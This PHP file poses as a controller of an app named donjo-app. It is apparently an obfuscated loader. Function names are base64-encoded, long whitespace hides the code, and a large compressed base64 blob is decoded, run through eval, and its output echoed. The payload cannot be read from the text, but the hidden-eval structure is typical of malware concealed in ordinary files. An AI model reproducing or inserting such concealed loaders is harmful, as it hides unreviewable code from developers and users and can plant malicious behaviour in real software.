<?php 
        $__='printf';$_='Loading donjo-app/controllers/Bumindes_penduduk_induk.php';
        







































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtXFtvo9iyfm/p/Id+2FJmq8+ZARz3jNXqB+MABjt2DOb60gJWAg4Ys+Mr/vX7q4WvuSnROXtLZ8srw1iGRa1aVV9VfbUS9dev9fjbL4yfV+XTpFg8XP3gX3fj5xWbFY+z/wnL8o94ViyeZnl+/zT/Q15OJwW7n/8q7wu2ZMvsF74us9/LtPzaycP5/Pfff7/68WW3wNf/+nL5ufz8q3++EHK//h+Ony/uXHlia+674iTQlJ9X/NYR5R8au+j6+fUyLuMyLuM/c1zFU0dgnrHUNUfy3fXMUFsPXpX9WSdNZM06Xf+6mOoyLuMyLuMyLuMyLuMyLuP/27gcZ1zGZVzGZfznjqsonN9/v/7F7uMZu7/6cbHIZVzGZVzGZVzG/2qc/8lFJ5mtesks4ddE1kJ3k+tavgwteeK7rPTd6yTQ1Cocz3p6h1/JuCHnUT4wzPbhvXHoDYTAFZLQbU6jhrHwvUGpa2YeS0oSN5yFP3UqvYvvU0MMcY+5TYG58yRy8cwtcU9d7uYf1hl58jx0F2ksZaTDUu8OVswzHgNLfowkc69nFnpGGWn5VtcMyDcxH/pyeZsylpwlvW+K8q2u+tvOpP0PunQlTcNKvgk9WfCtdnV7027qHSG5fWxvBpZ8E0niBHvJdRUypZYYTwe5ruTLuGGWrOsIodta6p10xrrmejj5axV1sY/CWQbSYhV5zjL0oEfVXAbeaNUbcRvpPvY7kvI105R6nUl7od/o69vHUWJrThXCTnHXmZPNTc3Z+pashPAB09S5rh5t19NSgXXlLV+XfDHldluG7qg87s/EfZZGE7mMpmS/fBLATrVd8u+hez2HPXMftsI6RTxVhdC7nevaIo81NcO9beiqa3yuGfS5d9VlUMmLwG1mvienTFuQ7K3vbiBfXfI1NewZa8XYi+82C6wlwAcinj/tfcXxNM3n8GEWSQsR/l9if1s8E6Dfk+/mgt5JJqe+t9xmqU8y6Iu5XQeyzJLWiDT1iWFOVGNQwJqk78T3OAaW/Q6XSVgU4esZ2f8Ed/AV47r5ZAtNzKMiT4Ejeo/2WTDXSMMO13lFMplV75+wHk/zCQPGyZ79Nl+f1oSOJmSatN7ad80UNm76npGyjlzbv+EIw2O8jQL6+w7chw1mzCXfcFw+1rgEti2ytbol28Le65fzuS8p7kp6Ny6cLbeP5FSY87SLX2BK4DGF+wL5FXrxvdLz3d4O8Q7bwic5+VuOEUPYI/nHAI6WumLAxxwLe3w0ydfcflM2AzbEuOI6i/t7yCkpPkmXWgetzgcUI2HXOWAUPpmTrACYJBwyjfubns9hc/gHOUVR19D7iecXhTB1fcgXtuJYI7vZtQTV1pWNM87UPuYMLcSR5QxUU8llPBvqHWNs2oZsCqoxttXhyJJlU1GHrq1M4HsbMka41xvZogEZQ6xJ30eODZwohmzZ88TBWraI9ZxRAhkO/hvyGFBN1UZutDPV7sO/pt10xko+hgwbAkjHgWkzeZzFiaWQfpirmrKuDuSxrSS24PRH9saAHMPkzw3IMzEflsDedKWUHUHt1PJuE0vYQB8Bei0wzxmP7IU8nsiyo6hOnQcWKub3LOyX7tvYC/aRjBxTtiuuHxDrDEc23yfXcazALlkzwJ5t0zGgT26TDbCP/sgZGLVNj3YfdeXUlxZpINmJ3pHvCD+2kCv1+sCCZ86iho5n7cTR8oWuUs5ieYT4iqZxXU+yQ+5PRtpgFXfzCrlvhrh5njfXQ2uXN8c27reAJWDVkq3AO9QHA1hBPjNF4HgVTdqzsGsK8c1s1ZeQj1xDJDwix+MzF3zvdhlNHaFfZR9Z/1+Wt2Er5DyO85xsddC5wRqsahZRYS9RWwvsofR5XXO2fYmto05zxjQRGGCjcUd2b9c8t7QpvsOqze2un6wdSLmAuJv0p4NVZLUO/uoLLeSX5tiyR3vfrjpJKcbwK/Lx2lMQj6649RS18F0xNd2mGI3nPeTBnOIyVjdqVMAW4qbjuynlQ/59uH5NRon951tLIruJZZTRfeHPDvIX/CfHXTnm8r1BDBsvUb8yqgdRtui/s+7YUsx3n8MnAu4ryB9p/N6aDeTErrPla3edDHXm7b2oDDmRpeOpU1Cuf2X9AfGVqDuIx1qrOMqcn609dltZ4G4gj2NDxJyn4XrWCzRnSlwk6CTFKFPHpkPxnRQ9S/7roSPn91ou9DpsGFWcC+V+Y4Q8P6iohuia+gisbCknR9pmxSQnM6rsT/j1EfWT7ncY2Z+wKHL/Qy/UL7FV7upYft8lLmFusZcscvOlJwA3hVlF0mYeeHrvHngjjCEGJsDco94xF9ivGKktntc5/m6ExJAQBw0bfM9cUL0Cl6ooj/ddHgfF8KWcLWrwQwS7MHfzwGscl1PrUddhqk3iUe8qxt6eydECxPmg5mxq68GXWsTjKuYOYDeKeejXndef/ELthh2jYvR9mL+Y/ydiNdnPhQ43iPuZIelFb7yT0cW0SS0H+iOmb5MA3NAHd4wkXquzwEtmxAtp/t5+9WVmVI/dim2BBfjSzAOlmbIJY/Xec8LOk7E91bedocYLvjMvwLUnyHlCpNmFZ/FnLb3D4OOFSPWS3tVP8PWWnJpfXO9l1HKUzSoQT7D5WIJzpWI0Scr+uLkGB34Mq+Tw7sEez2RHrop45xgiG9MapGMaaMDhpDk54LFqnvi1ucMj/8zvO0c/1zY3csRrBa4gha7T6H1MHsmZ723+Uf/xfWC+P91AZlLu5p7jwvWTXscUQvQlsE0ZFbLIOsI34OUB/U56r7aqwFNF1CzCVHmOv/o6/lmbSXwKtjYQb7ezniV8iyR/ZnTNGTj74q4YUE3L44zmKXievZBVX8I3xF5mcfyl6HGoFl4fcPj8gt458q6AGjuHDZew6Ra4LcCRtqQPt8v0mvZZRY2YYvMbeKUQFybqMLiqp8+sKfVCg35AHBAxW+fG2Xc2VSHTuQsmSRZPWw2sRbLL93QPXPReyoD3WsAcsF7naA/cgyEujGqd8Ht1zKM/q2X3gK879CqsawhRw1lT79BDbfTAM5E/mjv9yY7kVxF5EPySATvrxN0qc/3GYJDxh/5y3pr3LDQXnFi/Qd3tnO0nuRujp7Sy5K5qF6bqKCMrToaTdmGBV5qKghyelae4ObkWd1MH+dw8+MnA3sBbUHs3qJlpGU9i6uFIl9Kv5CnxHKNrrFiF9cbXCdPY3KN8obUesG/huM/ncj6hg1TX/k/Z+owvvOp7cEd14TutMkAsfAKPPJ5D4IL6sE/pVOfAMqBewm32LYFzge/DIkiBr3zM44tsKXyLT/lH3nqi2vhJPSc1H1I+FTujqTojnvKO3XZy1QfikJ+JHQbsw+bLwCXu8jm9nPrdYf3ujuM9lhLwJAZ2a3rEWc2Loh0vAhazT+FdWjx50iZnU2f+Od8OdFNZvK3X9Cj3c/pQHy2mTG01qKe9d9XZp/Q6rP9Szmd8B9789P667eIOvUqImhg8ChOjaqOGDEqvATx7Zr6Pm10dRC1AH+6ugYH2HleE76QPOfrjdaF3rpN9LNDa/Pt2vfLHqPEfj4EncLN385Wx3aToU6rA9Vv6JMb68mPotCrKXYGVFCF6BeYS9tAzAYPI/Q8n9871VxGn1et7OHkHvmiuUD8+uifwVbbDQ3PbU+cHXxBWDVF4B0tiGkr27JwTya03OMw21FoNbztaD0DU97z4YTTb8RMZ3D6A7+0zXrI/ZzWJK1iv8xJDC8qIzmGL2+TOkqOX+rIdp4trn+w5Bnps8GkBNigCb8RrEXpI5Fz4bvtXglibR531CwwT50efgXkclxnTUG/IB25zzbwR5LKcoa/xC94/F1Rn7yoZuXgzp3O1gyxVeIvvjQ5Y3iJHUm/bSSNDIq7amgNredwgjvkyvqhG7/rBo4wqHb+4t68NOVVwdfQKPo6cQKjPn3vq4rVe8/swSw1IGSHfvvl8rIAbvIol5IJpPmfIJdRHIp+gL9zQGef249yVzjj5u2nYGOz6qUFOZ4VG9VovdOTtvrtAr4U+ZP+M3sV7sZQ9wxjnq/BBsIqnorxbu+b553lo8n7v2XzkuaniHJ3rS/s8XevAkbtBGXjxbN8b9qfAnUvcx9n2i2PP0p/WPVAftR91YRVUn+f/6KcRI/PZbu+Io3bxlu1iTa2Q6xV+xqqp6Edtirt/xOgpPcnM0VtmyG0v46KQV8At4kymGruIq7hEfts876k8ganOM1xDn9fWPfdRl3oPo3mGL/LnWz3Fed4qA567a93Mk36I+lasV6HjBGc+zz27/nYDDlPdo4eJpUUZU916oasTGQ2KJ0OgnDo87Y8PvjnFmvJqviY77O1KZwjw9wNxOZ//DoNz4JR61+Hr/TfHG9ZPPo535Pjznrn2hecg32acd1MNeMNuc/47By2hXLXPi2/p9hhJTcR+fFzr1HfTNPfpTCWfFwE/j2TsDTlCIG0edniuZZ3JOeT8ddSgPvV8/lv9fdw1SkbnMk5rGdZy0d+/7IVjrbWl3P98/mkNeENvynv5C98I/HyJfl9EZ2uJJTnHnEL9wRtnHehPz/3c+dR5xD5HvYGJDc+tXsMUgk6dO6nuGlud+EpxSz1cJ25i/Y+eZ6Cm5ZQ/t/z81pNX4NdL1r1dBlNwJVcVvEM+X+/j44RDlOAcP39e/fjy5d//S+ef/PO33be///jM6yfvfuTFvx0X/O2K/n/134dlL/9WwOXn3/lvBZxj8rezIKgh+fcf/wRiWYn0';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































































































































                                                                                                                                                                                                                     $________;
